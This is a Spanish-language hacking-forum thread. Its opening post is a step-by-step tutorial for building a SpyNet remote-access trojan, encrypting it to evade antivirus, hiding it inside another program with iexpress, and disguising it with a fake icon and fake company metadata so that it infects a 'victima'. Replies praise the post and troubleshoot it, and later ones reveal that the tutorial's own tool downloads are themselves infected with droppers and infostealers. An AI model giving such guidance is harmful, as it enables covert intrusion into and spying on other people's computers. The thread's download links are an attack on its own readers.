Bueno Como no he visto una tutorial de este grandioso troyano e decidido Hacer una... Espero les sirva de mucho y empezemos:

Necesitan descargar el SpyNet, lo pueden hacer desde aca:
Descarga:

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

Contraseña: Spy-Net

Les Recuerdo que ya deben tener su dominio no-ip si no sabes que es esto y como se puede tener aqui lo encuentras

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

Tambien deben tener los Puertos respectivos Abiertos. si no saben como busquen en el foro ahy muchisimos posts sobre como abrir los puertos

Una Ves Descargado el Troyano, lo Ejecutamos y Si les aparese un mensaje como este

Den click en desbloquear, asi los puertos por defecto que lleva el troyano se abriran automaticamente.

Una ves Abierto Sigan los Siguientes Pasos:

Damos click en nuevo para empezar a crear nuestro Servidor


Ponemos lo respectivo como muestra la imagen


Luego damos click en instalasion del servidor y hacemos como se muestra en la imagen


Damos click a Arranque y Hacemos lo Siguiente


Click a depuracion de lucha y hacemos lo siguiente


Damos click a Varios Opciones y Dejamos como en la imagen


y Por ultimo damos click en Crear Servidor y Ponemos igual que en la imagen


Una Vez Creado el Servidor Es Hora de Acerlo indetectable Ademas de Disfrasarlo con otro ARchivo, Es decir dejarlo una maravilla, Empezamos con los Siguientes Pasos:

Primero que nada Encryptamos nuestro server Aqui ahy muchos crypters que pueden ser de gran utilidad.

[Solo usuarios registrados pueden ver los links. REGISTRARSE]

Una Vez encryptado nuestro server, Ejecutamos el iexpress para juntarlo con otro archivo de esta manera:

1. Inicio
2. Ejecutar
3. Escriben "iexpress" Sin las comillas
4. Dan click en siguiente
5. Click en Siguiente
6. Escriben algo no llamativo como "System"
7. Click a Siguiente
8. Click a Siguiente
9. Suben el Server Ya encryptado y el Programa con el que deseen juntarlo
10. En Install Program Seleccionan el Server y en Post Install Comand Tambien
11. Seleccionan Hidden
12. Dan click a siguiente
13.Dan click en Browse, escriben el nombre con el que deseen que se guarden los archivos juntos, luego dan click en Hide File Extracting...
14. Click a No restart
15. Click a Dont save
16. Click a Siguiente
17. y Click a Finalizar

Una Vez nuestro server quede unido a otro archivo cambiaremos algunas cosillas para hacer que paresca mucho mas confiable.

Nos descargamos estos dos Grandiosos Programas (ResHacker y Exescope)


Descarga: http://www.sendspace.com/file/u7w1rs Reshacker y eXeScope

Una Vez Descargados Ejecutamos el Reschaker y Hacemos lo siguiente:

Damos click a File, luego a open y seleccionamos nuestro Server unido al otro archivo


Una Vez Abierto el archivo Dan click en AVI Luego en 3001 y luego dan click derecho y seleccionan la opcion "Delete Resource" y lo confirman.


Una vez echo esto hacen lo mismo pero esta ves no seleccionan Delete Resource sino Replace Resource


Dan click en Open file with new icon y seleccionan algun programa con un icono llamativo, lo seleccionan y lo abren.y dan click en Replace.


Luego Dan click en File - Save As... y Lo guardan con el nombre que deseen pero recuerden ponerle al final ".exe"


y Listo! Nuestro Server queda con el icono Cambiado!


Luego de esto Abren El programa ExeScope Dan click en Fichero, luego en Abrir y Seleccionamos nuestro server


Una ves echo esto Damos click en Resource Luego a Version y seleccionamos el uno, Luego damos click derecho en "CompanyName" y Cambian el escrito de Value con uno relacionado con el server, Repiten esto con "FileDescription"


y Listo, Nuestro Server Quedo Camuflado y muy Llamativo!, Probemoslo Haber que tal nos va...


Funciona Perfecto!!


Listo, Ya con nuestra victima en el cliente Es hora de Empezar a utilizar las opciones que nos da este maravilloso troyano



Tutorial 100% Creada por TheftTime, Respeta los derechos de Autor

Espero les haya gustado.

Buenisimo el tutorial =D *palmas *palmas *palmas *palmas

Q buen comienzo

Saludos!

bueno tutorial :P solo ke la 1º imagen te salio 1 poco cortada pero da = se entiende ;D

es necesario que el no-ip sea .biz, lo digo porque el mio es .info

no, puede tener la extensio q vos quieras, mientras sea funcional

La contraseña al extraer el rar es incorrecta!!! cual es??

"Spy-Net" no es!


ok lo siento, avia que poner un espacio al lado de spy-net,

buen trabajo amigo

gracias x el tuto man
saLUDos!

Gracias a Todos, Pronto modificare la tutorial agregando lo del no-ip y poner indetectable el server Saludos

muy buen manual, gracias !!, esperare la otra parte del tuto.

Ya termine la modificacion espero les Haya gustado =)

Que Grandiosa Tutorial, Me sirvio de pelos! Muchisimas gracias

aportaso a ponerlo en parctixa

SI SUPIERAS LA MITAD DE LO QUE SE .... JMB

Esta muy bien explicado, y justo las herramientas necesarias, gracias es de gran ayuda, el unico problemita hay seria el crypter pero bueh, no todo puede ser perfecto.

[size=15pt]Cuando el Poder del Amor supere al Amor por el Poder, el Mundo conocera la Paz..[/size]<br /><br /><br />

No pongo un crypter porque se que a medida que pase el tiempo sera detectado por todos los antivirus, por eso les dejo ese link ya que se ctualiza constantemente

muy buen tuto!!! solo que tengo un proble ya que lo intento usar no me sale nada en el psy-net osea lo ejecuto y no pasa nada, el spy me manda un cartel que dice "serviores online 0 " tendra algo que ver por que ni yo pude auto infectarme gracias.

no desvirtues, en todo caso crea un tema nuevo o usa el consultorio.

Desactivaste el av?

Sige tal cual la tutorial, y tu problema es que debes abrir los puertos desde el router mira en el foro ahy muchos temas con este problema

Genial este tuto.

Junto a uno que vi del TurkoJan lo mejor.

Saludos!

bien, ahora quiero k me expliques un par de cosas TheftTime


1º - pork el EXESCOPE.exe pesa mas k la version descargada de la pagina oficial, y pork detecto dentro de EXESCOPE.exe 5 archivos, y en el oficial, solo hay uno siendo el original


2º - pork EXESCOPE.exe es un dropper de 5 archivos


ya me puedes dar una explicacion convincente.




un saludo.

¿EOF, has analizado el server?

A mi de primeras mi Norton me ha cogido el único exe que hay como un robador de información infostealer.

Ahora voy a ver que nos da en novirusthanks.org

SAludos!

el server parece k anda limpio pero lo k no anda limpio es la descarga http://www.sendspace.com/file/z373je

y espero una explicacion por ello



un saludo.

Nose ???

Mira lo que me salio al darle a analizar el exe, de dentro del rar.

vale el reshacker tambien esta infectado, y ahora ya de paso TheftTime, tambien quiero k me digas que hace acoplado con los dos ejecutables un archivo llamado Crypted1.exe.


mas vale k des una buena explicacion.


un saludo.

Si, es raro, pero bueno.

No se como hay gente que en un foro de hackers, se pone a meter keyloggers, o stealers.

Saludos!

Mis disculpas a todos, es mejor que no descargen aquel programa ya que al pareser esta infectado.
lo coji de otro foro en el que estaba posteado estos dos programas pero pronto subire los programas sin que esten infectados

Saludos